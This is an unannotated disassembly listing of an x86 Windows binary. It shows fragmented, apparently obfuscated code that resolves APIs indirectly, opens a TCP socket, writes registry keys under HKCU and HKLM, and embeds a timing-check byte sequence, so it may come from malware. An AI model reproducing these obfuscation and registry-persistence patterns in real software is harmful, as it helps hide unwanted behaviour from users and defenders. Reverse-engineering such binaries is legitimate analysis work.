align 10h
; =============== S U B R O U T I N E =======================================
sub_9AFCA0 proc near ; CODE XREF: sub_9B1D80-24AF�p
; sub_9B04A8+1�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
pop eax
push eax ; netlong
call sub_9A4033
add esp, 4
neg eax
sbb eax, eax
inc eax
retn
sub_9AFCA0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0FD0
loc_9AFCB4: ; CODE XREF: sub_9B0FD0+C7F�j
inc eax
jmp loc_9B1018
; END OF FUNCTION CHUNK FOR sub_9B0FD0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACF9C
loc_9AFCBC: ; CODE XREF: sub_9ACF9C+8CF6�j
push esi
pop ecx
mov eax, ecx
mov esi, [ebp+8]
push dword ptr [ebx+44h]
pop edi
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, ebx
call sub_9B3150
and eax, eax
jz loc_9AF134
jmp loc_9B2D30
; END OF FUNCTION CHUNK FOR sub_9ACF9C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AFCE8: ; CODE XREF: sub_9B1D80-3433�j
; DATA XREF: .text:off_9BAEF9�o
sbb eax, eax
inc eax
mov [ebp-2064h], eax
push ecx
lea edx, [ebp-201Ch]
push edx
push dword ptr [ebp-204Ch]
pop ecx
push ecx
push eax
push ebx
mov edx, [ebp-2050h]
push edx
push 0
push esi
loc_9AFD0D: ; CODE XREF: sub_9B1D80-6CBE�j
push dword ptr [edi+4]
pop esi
call sub_9AB040
push eax
push 1
mov eax, [ebp-2048h]
push eax
mov ecx, [ebp-2054h]
push ecx
call sub_9B2F1C
add esp, 30h
loc_9AFD2F: ; CODE XREF: sub_9B1D80+47E5�j
mov eax, [ebp+10h]
test eax, eax
jnz loc_9B1D5B
jmp loc_9AD2A0
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AB7C0
loc_9AFD43: ; CODE XREF: sub_9AB7C0+5E�j
; sub_9B04A8-3A6C�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9AB7C0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AFD68: ; CODE XREF: sub_9B1F68+22F4�j
; DATA XREF: .text:off_9B88A2�o
push 0
push esi
call sub_9B0E7C
mov edx, [ebp-38h]
push edx
push esi
push off_9BA0BD
call sub_9ABF08
push dword ptr [ebp-50h]
pop ecx
mov [ecx], eax
or eax, eax
jnz loc_9AFB74
jmp off_9BAE6A
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9AFD94: ; CODE XREF: sub_9ADAC4-65F�j
; DATA XREF: .text:off_9B896F�o
push eax
xor edx, edx
call sub_9AD590
and eax, eax
jz loc_9AAFA3
jmp loc_9AAF9C
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AFDAC: ; CODE XREF: sub_9B4FD0-54B9�j
mov ebx, ecx
mov [ebp-228h], ebx
mov dword ptr [ebp-4], 0FFFFFFFFh
jmp loc_9ACDE1
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AFDC0: ; CODE XREF: sub_9B1F68-510B�j
mov edi, ebx
mov [ebp-34h], edi
inc ebx
mov [ebp-30h], ebx
lea edi, [edi+edi*2]
shl edi, 2
sub ecx, ecx
lea esi, [edi+ebp-250h]
push esi
pop edx
mov [edx], ecx
mov [edx+4], ecx
mov [edx+8], ecx
push dword_9BCB74
pop eax
mov ecx, [eax]
call dword ptr [ecx+30h]
mov [esi], eax
mov edx, dword_9BCB74
mov eax, [edx+10h]
push 6
push 1
push 2
call dword ptr [eax+20h]
lea ecx, [edi+ebp-24Ch]
mov [ebp-4Ch], ecx
mov [ecx], eax
jmp off_9BA8B1
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AFE14: ; CODE XREF: sub_9B4950+12F0�j
; DATA XREF: .text:off_9B9978�o
lea ecx, dword_9BEC34[esi]
call sub_9B31A8
lea ecx, dword_9BEC38[esi]
call sub_9B31A8
lea ecx, dword_9BEC3C[esi]
call sub_9B31A8
lea ecx, dword_9BEC40[esi]
call sub_9B31A8
loc_9AFE40: ; CODE XREF: sub_9B4950-98DC�j
; sub_9B4950+12EA�j
inc edi
jmp loc_9ABB3E
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9AFE48: ; CODE XREF: sub_9AC6DC-C2E�j
push 0
push 55h
push edi
push esi
call __allmul
push 0
push 64h
push edx
push eax
call __aulldiv
cmp ebx, edx
ja loc_9B6188
jmp off_9B9F24
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AFE6F: ; CODE XREF: sub_9AB1A0+5397�j
; sub_9AB1A0+ADBF�j
mov dword ptr [ebp-4], 0FFFFFFFFh
push off_9BAD92
jmp loc_9B11F8
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AFE8C: ; CODE XREF: sub_9B0930-193D�j
; DATA XREF: .text:off_9B9A0C�o
push off_9BA850
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
push dword ptr [edx+10h]
pop ecx
mov [ecx+8], eax
mov edx, dword_9BCB74
mov eax, [edx+10h]
push dword ptr [eax+8]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp loc_9B5780
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9AFEC0: ; CODE XREF: sub_9B4CF4-3F21�j
mov ax, word_9B93B4
mov [edi], ax
loc_9AFEC9: ; CODE XREF: sub_9B4CF4-2785�j
test cl, 2
jz loc_9B0E00
jmp off_9BAA4D
; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9AFED8: ; CODE XREF: sub_9B4FD0-136C�j
push dword ptr [ebp+1Ch]
pop edx
cmp dword_9BBF7C[eax], edx
jnz loc_9AB8C4
jmp loc_9AED84
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AFEF0: ; CODE XREF: sub_9B63D8-46AD�j
cmp dl, 39h
jg loc_9AF944
jmp loc_9AF9E0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AFF00: ; CODE XREF: sub_9ACEE8-850�j
mov dl, [eax+ebp-0B0h]
or dl, dl
jnz loc_9ABB6C
jmp off_9BAEF5
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9AFF18: ; CODE XREF: sub_9B5904-1569�j
; DATA XREF: .text:off_9B975D�o
mov esi, eax
mov [ebp-20h], esi
loc_9AFF1D: ; CODE XREF: sub_9B5904-465B�j
cmp esi, 0FFFFFFFFh
jz loc_9B42FE
jmp loc_9AC524
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AFF2C: ; CODE XREF: sub_9B03E8+1E20�j
mov ecx, dword_9BF380
or ecx, 2
mov word ptr dword_9BF380, cx
loc_9AFF3C: ; CODE XREF: sub_9B03E8+1E1A�j
cmp al, 3
jnz loc_9AC404
jmp off_9B89A2
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AFF4C: ; CODE XREF: sub_9B4950-1817�j
lea edi, [eax+eax*4]
shl edi, 3
cmp dword_9BEC1C[edi], ebx
jz loc_9B332E
jmp off_9B8F9A
; END OF FUNCTION CHUNK FOR sub_9B4950
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AFF64 proc near ; CODE XREF: sub_9AF25C:loc_9AB8CC�p
; sub_9AF25C-2D4A�p
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = byte ptr -224h
var_120 = byte ptr -120h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009ACBD4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009ACE7C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009ADB20 SIZE 00000070 BYTES
; FUNCTION CHUNK AT 009B0444 SIZE 00000053 BYTES
; FUNCTION CHUNK AT 009B128C SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B3DF0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5807 SIZE 0000003A BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B9121
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 220h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
sub edi, edi
mov [ebp+var_18], esp
mov [ebp+var_228], edi
mov eax, dword_9BCB74
push dword ptr [eax]
pop ecx
push off_9BADC8
call dword ptr [ecx+18h]
mov [ebp+var_4], edi
lea edx, [ebp+var_120]
push edx
push 3
call sub_9B6078
add esp, 8
push dword_9BBE3C
pop eax
mov ecx, dword_9BBD28
cmp eax, edi
lea eax, [ebp+var_224]
jmp loc_9B128C
sub_9AFF64 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9AFFE4: ; CODE XREF: sub_9ABD30+26�j
; DATA XREF: .text:off_9B8D14�o
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
push 0
mov eax, edi
sub eax, esi
push eax
lea ecx, [ebp+esi+0]
push ecx
push ebx
call dword ptr [edx+44h]
and eax, eax
jl loc_9AF2B4
jmp off_9BA5F8
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B000C: ; CODE XREF: sub_9B0930+1730�j
; DATA XREF: .text:off_9B92D5�o
push offset aLeavecriticals ; "LeaveCriticalSection"
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+1Ch], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
push dword ptr [eax+1Ch]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp off_9B8DB2
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9B003C: ; CODE XREF: sub_9AC6DC+5734�j
; sub_9AC6DC:loc_9B3F44�j
mov eax, dword_9BBD20
dec eax
sub edx, edx
or eax, eax
setl dl
dec edx
and eax, edx
loc_9B004C: ; CODE XREF: sub_9AC6DC-387�j
; sub_9AC6DC+4E99�j
mov dword_9BBD20, eax
loc_9B0051: ; CODE XREF: sub_9AC6DC+572E�j
; sub_9AC6DC+9AC4�j
push dword_9BBD10
pop eax
loc_9B0058: ; CODE XREF: sub_9AC6DC+515B�j
or eax, ebx
jnz loc_9ACC74
jmp loc_9B5090
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B0068: ; CODE XREF: sub_9B3864-183�j
pop ecx
push ecx
mov eax, [ebp+var_2028]
xor edx, edx
test eax, eax
setnz dl
push edx
call sub_9B4FD0
mov [ebp+var_2070], eax
cmp eax, 0FFFFFFFFh
jz loc_9AF480
jmp loc_9B3374
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9B0094: ; CODE XREF: sub_9B3150-6DA6�j
push ecx
pop eax
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push dword ptr [ebx]
pop eax
mov ecx, [ebx+48h]
lea edx, [eax-200h]
push edx ; int
push ecx ; int
lea eax, [ecx+eax-200h]
push eax ; int
push dword_9B8A14
pop ecx
push ecx ; int
push Src ; Src
call sub_9A8C4C
add esp, 14h
test eax, eax
jnz loc_9AADE4
jmp loc_9B5F24
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B5FC0
loc_9B00DC: ; CODE XREF: sub_9B5FC0+4F�j
; DATA XREF: .text:off_9B9018�o
lea eax, [ebp+var_120]
push eax
push 1
call sub_9B6078
add esp, 8
mov ecx, dword_9BCB74
push dword ptr [ecx+0Ch]
pop edx
lea eax, [ebp+var_124]
push eax
push 20006h
push 0
lea ecx, [ebp+var_120]
push ecx
sub eax, eax
and esi, esi
setnz al
add eax, 80000001h
push eax
call dword ptr [edx+20h]
test eax, eax
jnz loc_9B2D27
jmp off_9BAB56
; END OF FUNCTION CHUNK FOR sub_9B5FC0
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B2010
loc_9B012F: ; CODE XREF: sub_9B2010-3903�j
; sub_9B2010+39B6�j
mov [ebp+var_4], 0FFFFFFFFh
mov eax, dword_9BEBF4
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B2010
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B35A0
loc_9B014C: ; CODE XREF: sub_9B35A0-2B84�j
; DATA XREF: .text:off_9B8DF3�o
cmp eax, 0FFFFFFFFh
jz loc_9B10EA
jmp loc_9B10DC
; END OF FUNCTION CHUNK FOR sub_9B35A0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B015C: ; CODE XREF: sub_9AB1A0+2A7D�j
; DATA XREF: .text:off_9B9F5E�o
mov ecx, dword_9BEC20[eax]
or ecx, ecx
jz loc_9ACCA6
jmp loc_9ADFDC
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9ADB10
loc_9B0170: ; CODE XREF: sub_9ADB10+B�j
mov edx, dword_9B9A54
mov [edi], edx
mov eax, dword_9B9A58
mov [edi+4], eax
push dword_9B9A5C
pop ecx
mov [edi+8], ecx
push dword_9B9A60
pop edx
mov [edi+0Ch], edx
mov eax, dword_9B9A64
mov [edi+10h], eax
mov cx, word_9B9A68
mov [edi+14h], cx
; END OF FUNCTION CHUNK FOR sub_9ADB10
; START OF FUNCTION CHUNK FOR sub_9B27D8
loc_9B01A7: ; CODE XREF: sub_9B27D8-3201�j
mov edi, ebx
dec edi
loc_9B01AA: ; CODE XREF: sub_9B27D8-2628�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_9B01AA
jmp loc_9B0F40
; END OF FUNCTION CHUNK FOR sub_9B27D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9B01B8: ; CODE XREF: sub_9B04A8-3262�j
; sub_9B04A8+1449�j
inc dword ptr [ebp-4048h]
jmp loc_9ACA32
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2C70
loc_9B01C4: ; CODE XREF: sub_9B2C70-5B81�j
; DATA XREF: .text:off_9B9010�o
push 0
push ebx
call sub_9B0E7C
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
push ebx
loc_9B01D8: ; CODE XREF: sub_9B2C70-42AA�j
call dword ptr [edx+38h]
; END OF FUNCTION CHUNK FOR sub_9B2C70
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B01DB: ; CODE XREF: sub_9B1F68-4A7�j
; sub_9B1F68-2BA�j
dec dword ptr [ebp-30h]
loc_9B01DE: ; CODE XREF: sub_9B1F68-5111�j
; sub_9B2C70-5B87�j ...
xor edi, edi
loc_9B01E0: ; CODE XREF: sub_9B1F68-23F0�j
; sub_9B1F68+4276�j ...
mov [ebp-34h], edi
mov ebx, [ebp-30h]
cmp edi, ebx
jnb loc_9B5EE0
jmp off_9B8D3E
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
dd 90C3310Fh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B01F8: ; CODE XREF: sub_9B3864-647E�j
and ebx, ebx
js loc_9AE2AC
jmp loc_9B28CC
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B0208: ; CODE XREF: sub_9B1D80+3572�j
jnb loc_9B5354
jmp loc_9B1E30
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9B0218: ; CODE XREF: sub_9AD97C+61�j
push ecx
call dword ptr [eax+20h]
and eax, eax
jz loc_9AF884
jmp off_9B99EE
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B022C proc near ; CODE XREF: sub_9B2118-1B5F�p
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push edi
push off_9B9632
call dword ptr [ecx+68h]
xor edx, edx
xor eax, eax
mov dword_9BCBB4, edx
mov dword_9BCBB8, edx
mov dword_9BCBBC, edx
mov dword_9BCBC0, edx
mov edi, off_9B985C
mov ecx, 801h
mov dword_9BCBC4, edx
rep stosd
mov dword_9BCBC8, edx
mov dword_9BEBD0, eax
mov dword_9BEBD4, eax
pop edi
retn
sub_9B022C endp
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABA3C
loc_9B028C: ; CODE XREF: sub_9ABA3C+96B8�j
; DATA XREF: .text:off_9BADF4�o
mov dword ptr [ebp-124h], 1
loc_9B0296: ; CODE XREF: sub_9ABA3C+96B2�j
mov edx, dword_9BCB74
push dword ptr [edx]
pop eax
lea ecx, [ebp-120h]
push ecx
call dword ptr [eax+44h]
jmp loc_9AB51F
; END OF FUNCTION CHUNK FOR sub_9ABA3C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9B02B0: ; CODE XREF: sub_9B3FF8+128C�j
sub edi, edi
mov di, [esi+8]
test edi, 8000h
jz loc_9B2884
jmp off_9B94F4
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AFB1C
loc_9B02CB: ; CODE XREF: sub_9AFB1C+1DC0�j
; sub_9AFB1C+40A6�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AFB1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3EFC
loc_9B02E4: ; CODE XREF: sub_9B3EFC-5BC0�j
; DATA XREF: .text:off_9BAF57�o
mov ecx, eax
and ecx, 0FFFFh
cmp ecx, 0FEA9h
jz loc_9AD6E0
jmp off_9BA4D9
; END OF FUNCTION CHUNK FOR sub_9B3EFC
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B0304: ; CODE XREF: sub_9B63D8-8D9B�j
add ebx, eax
mov [ebp-2128h], ebx
push dword ptr [ebp-2124h]
pop ecx
cmp ecx, 0FFFFFFFFh
jnz loc_9B1E18
jmp loc_9AE2F0
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B0324: ; CODE XREF: sub_9ACEE8-180C�j
; DATA XREF: .text:off_9BAB01�o
xor ebx, ebx
mov [ebp-0B4h], ebx
call sub_9B227C
sub ecx, ecx
mov [ebp-0B8h], eax
sub edx, edx
call sub_9AC6DC
jmp loc_9ACF55
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B2118
loc_9B034B: ; CODE XREF: sub_9B2118-26D9�j
; sub_9B2118-1B32�j ...
mov [ebp+var_4], 0FFFFFFFFh
push [ebp+var_1C]
pop eax
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B2118
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B036C: ; CODE XREF: sub_9B63D8-8491�j
; DATA XREF: .text:off_9BA8E0�o
cmp word ptr [esi+0Ah], 4
jnz loc_9AF944
jmp loc_9B1218
; END OF FUNCTION CHUNK FOR sub_9B63D8
; =============== S U B R O U T I N E =======================================
sub_9B037C proc near ; CODE XREF: sub_9B2E04-3D63�j
; FUNCTION CHUNK AT 009AB9A8 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009ABFEC SIZE 00000044 BYTES
; FUNCTION CHUNK AT 009ACCFC SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009AD10C SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B2B08 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B5724 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B5E74 SIZE 00000035 BYTES
push ebx
mov edx, [ebp-4050h]
lea esi, [ebp-402Ch]
xor eax, eax
call sub_9B1334
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
push 10h
mov eax, esi
push eax
push edi
call dword ptr [edx+18h]
or eax, eax
jnz loc_9B572A
jmp off_9BA93C
sub_9B037C endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2160
loc_9B03B4: ; CODE XREF: sub_9B2160-AFA�j
push dword ptr [esi+48h]
pop eax
and eax, eax
jnz loc_9B2440
jmp off_9BAFA3
; END OF FUNCTION CHUNK FOR sub_9B2160
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3A74
loc_9B03C8: ; CODE XREF: sub_9B3A74+27E8�j
mov edx, dword_9BCB74
push dword ptr [edx+0Ch]
pop ecx
push eax
call dword ptr [ecx+14h]
loc_9B03D6: ; CODE XREF: sub_9B3A74+27E2�j
lea ecx, [ebp-130h]
call sub_9B5480
jmp loc_9AD33B
; END OF FUNCTION CHUNK FOR sub_9B3A74
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
sub_9B03E8 proc near ; CODE XREF: sub_9B1584-276A�p
var_A = byte ptr -0Ah
; FUNCTION CHUNK AT 009ABFC0 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009AC3F4 SIZE 00000052 BYTES
; FUNCTION CHUNK AT 009AE4CE SIZE 0000001B BYTES
; FUNCTION CHUNK AT 009AF0D4 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009AF4C4 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009AF9B8 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 009AFF2C SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009B21EC SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B2AD4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B2B4C SIZE 00000098 BYTES
; FUNCTION CHUNK AT 009B394C SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009B42D0 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 009B5690 SIZE 0000003D BYTES
; FUNCTION CHUNK AT 009B61FC SIZE 00000046 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BAB94
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14Ch
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp-1Ch], eax
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push dword_9BCB74
pop eax
mov ecx, [eax]
call dword ptr [ecx+84h]
test eax, eax
jns loc_9B61FC
jmp loc_9AF9B8
sub_9B03E8 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9B0444: ; CODE XREF: sub_9AFF64+1332�j
call sub_9AE860
add esp, 0Ch
push eax
lea edx, [ebp+var_120]
push edx
push 80000002h
call sub_9AD97C
lea eax, [ebp+var_224]
push eax
push 8
mov ecx, dword_9BBD28
push ecx
call sub_9AE860
add esp, 0Ch
push eax
lea edx, [ebp+var_120]
push edx
push 80000001h
call sub_9AD97C
mov [ebp+var_228], 1
jmp loc_9B5807
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEAAC
loc_9B0498: ; CODE XREF: sub_9AEAAC+2CE�j
; DATA XREF: .text:off_9B8FE5�o
test cl, 4
jnz loc_9B42FE
jmp off_9B9EE9
; END OF FUNCTION CHUNK FOR sub_9AEAAC
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B04A8 proc near ; CODE XREF: sub_9AB7C0+64�j
; FUNCTION CHUNK AT 009ABF94 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009AC7A8 SIZE 0000003A BYTES
; FUNCTION CHUNK AT 009ACA28 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009ACFFC SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009AD224 SIZE 0000002D BYTES
; FUNCTION CHUNK AT 009AD524 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009ADA08 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009AE460 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B01B8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B0EA4 SIZE 0000002A BYTES
; FUNCTION CHUNK AT 009B18E8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B1CDC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B1E80 SIZE 00000059 BYTES
; FUNCTION CHUNK AT 009B2630 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B27C0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009B4330 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B434C SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B4530 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 009B5188 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 009B5D70 SIZE 0000000B BYTES
push ebx
call sub_9AFCA0
add esp, 4
test eax, eax
jz loc_9AFD43
jmp off_9B942D
sub_9B04A8 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B43F4
loc_9B04C0: ; CODE XREF: sub_9B43F4+4A�j
; DATA XREF: .text:off_9BACDC�o
push dword ptr [ebp+8]
pop ecx
push esi
pop edx
call sub_9B3FF8
mov [ebp-20h], eax
test eax, eax
jz loc_9ACEAF
jmp off_9BA080
; END OF FUNCTION CHUNK FOR sub_9B43F4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B04DC: ; CODE XREF: sub_9B1D80+3120�j
js loc_9B3ECB
jmp loc_9B3C2C
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B04E8: ; CODE XREF: sub_9AB1A0-3C9�j
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop edi
mov eax, edi
mov ecx, dword_9BEC30[esi]
push ecx
call dword ptr [eax+34h]
push dword_9BEC2C[esi]
pop edx
push eax
pop ebx
push edx
call dword ptr [edi+34h]
and ebx, eax
add ebx, [ebp-20h]
push ebx
call dword ptr [edi+30h]
mov edi, eax
mov [ebp-1Ch], edi
push dword_9BEC2C[esi]
pop eax
cmp edi, eax
jz loc_9B290C
jmp loc_9ADCB0
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
align 10h
push 1
